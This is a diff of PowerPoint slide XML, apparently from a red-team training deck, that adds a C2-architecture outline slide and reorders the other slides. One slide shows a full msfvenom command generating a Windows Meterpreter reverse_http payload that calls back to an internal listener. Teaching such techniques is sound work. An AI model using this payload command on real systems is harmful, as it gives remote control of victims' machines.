--- a/TH 2025.pptx
+++ b/TH 2025.pptx
@@ -5,18 +5,19 @@
     <p:sldMasterId id="2147483648" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId11"/>
+    <p:notesMasterId r:id="rId12"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="264" r:id="rId2"/>
-    <p:sldId id="257" r:id="rId3"/>
-    <p:sldId id="259" r:id="rId4"/>
-    <p:sldId id="263" r:id="rId5"/>
-    <p:sldId id="256" r:id="rId6"/>
-    <p:sldId id="261" r:id="rId7"/>
-    <p:sldId id="260" r:id="rId8"/>
-    <p:sldId id="262" r:id="rId9"/>
-    <p:sldId id="258" r:id="rId10"/>
+    <p:sldId id="265" r:id="rId3"/>
+    <p:sldId id="257" r:id="rId4"/>
+    <p:sldId id="259" r:id="rId5"/>
+    <p:sldId id="263" r:id="rId6"/>
+    <p:sldId id="256" r:id="rId7"/>
+    <p:sldId id="261" r:id="rId8"/>
+    <p:sldId id="260" r:id="rId9"/>
+    <p:sldId id="262" r:id="rId10"/>
+    <p:sldId id="258" r:id="rId11"/>
   </p:sldIdLst>
   <p:sldSz cx="12192000" cy="6858000"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -204,7 +205,7 @@
           </a:lstStyle>
           <a:p>
             <a:fld id="{E002C5A6-4F3C-D84D-9221-1C111BE58B0C}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -620,7 +621,7 @@
           <a:p>
             <a:fld id="{F072C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
               <a:rPr lang="en-BE"/>
-              <a:t>3</a:t>
+              <a:t>4</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -719,7 +720,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{F072C456-DB8C-ED4F-9E61-F11EE322FFA0}" type="slidenum">
-              <a:t>5</a:t>
+              <a:t>6</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -886,7 +887,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -1084,7 +1085,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -1292,7 +1293,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -1490,7 +1491,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -1764,7 +1765,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -2030,7 +2031,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -2443,7 +2444,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -2583,7 +2584,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -2694,7 +2695,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -3005,7 +3006,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -3292,7 +3293,7 @@
           <a:lstStyle/>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -3533,7 +3534,7 @@
           </a:lstStyle>
           <a:p>
             <a:fld id="{E58B04C5-0B59-2A45-9F2D-0CB3007537AE}" type="datetimeFigureOut">
-              <a:t>09/02/2025</a:t>
+              <a:t>14/02/2025</a:t>
             </a:fld>
             <a:endParaRPr lang="en-BE"/>
           </a:p>
@@ -4955,6 +4956,86 @@
 </p:sld>
 </file>
 
+<file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C2BC26-AE94-B0C3-F3DD-417E80B60069}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-BE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDCCDDD-C51E-97CE-924E-748A96843386}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-BE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2429861388"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -4977,7 +5058,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A75761-3E29-EBE5-5C03-BDEBADC9FF8D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1FA3E9F-8BF6-9FD0-9063-51868E91577D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -4995,7 +5076,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-BE"/>
-              <a:t>Generate shellcode (requires loader)</a:t>
+              <a:t>C2 Archtitecture</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5005,7 +5086,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49294C1C-A7C6-575E-01D1-578FBC053D24}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649A8F84-7E97-EE50-3CFD-9E3B0DC59D1A}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5016,60 +5097,59 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="838200" y="1825625"/>
-            <a:ext cx="10515600" cy="949106"/>
-          </a:xfrm>
-        </p:spPr>
+        <p:spPr/>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-GB"/>
-              <a:t>msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.4 LPORT=80 -f csharp -o msf.txt</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-BE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="4" name="Picture 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC528F1-1A40-9C62-1479-7F6FC640220A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId2"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="728978" y="2774731"/>
-            <a:ext cx="7772400" cy="3287419"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
+              <a:rPr lang="en-BE"/>
+              <a:t>Team Server</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>(Redirectors)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Operator Client</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Listeners</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Payload (EXE, PWSH, Shellcode …)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Staged/Stageless</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Victim</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930875623"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31041376"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5101,7 +5181,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223EB6BA-66C8-A501-7821-306AF409DBC9}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A75761-3E29-EBE5-5C03-BDEBADC9FF8D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5119,7 +5199,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="en-BE"/>
-              <a:t>Custom Local Shellcode Loader</a:t>
+              <a:t>Generate shellcode (requires loader)</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -5129,7 +5209,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5D8256-0920-1DD5-09DA-3DFEF0DA75E4}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49294C1C-A7C6-575E-01D1-578FBC053D24}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5140,19 +5220,60 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr/>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="838200" y="1825625"/>
+            <a:ext cx="10515600" cy="949106"/>
+          </a:xfrm>
+        </p:spPr>
         <p:txBody>
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="en-BE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+            <a:r>
+              <a:rPr lang="en-GB"/>
+              <a:t>msfvenom -p windows/meterpreter/reverse_http LHOST=10.0.0.4 LPORT=80 -f csharp -o msf.txt</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-BE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="4" name="Picture 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC528F1-1A40-9C62-1479-7F6FC640220A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="728978" y="2774731"/>
+            <a:ext cx="7772400" cy="3287419"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2442976619"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3930875623"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -5184,6 +5305,89 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{223EB6BA-66C8-A501-7821-306AF409DBC9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-BE"/>
+              <a:t>Custom Local Shellcode Loader</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A5D8256-0920-1DD5-09DA-3DFEF0DA75E4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:endParaRPr lang="en-BE"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2442976619"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF0AABD6-7828-52DA-270A-5A9200709BC3}"/>
               </a:ext>
             </a:extLst>
@@ -5260,7 +5464,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide5.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6226,7 +6430,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide6.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6309,7 +6513,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide7.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6593,7 +6797,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -6673,86 +6877,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2318576908"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Title 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C2BC26-AE94-B0C3-F3DD-417E80B60069}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-BE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Content Placeholder 2">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFDCCDDD-C51E-97CE-924E-748A96843386}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="en-BE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2429861388"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
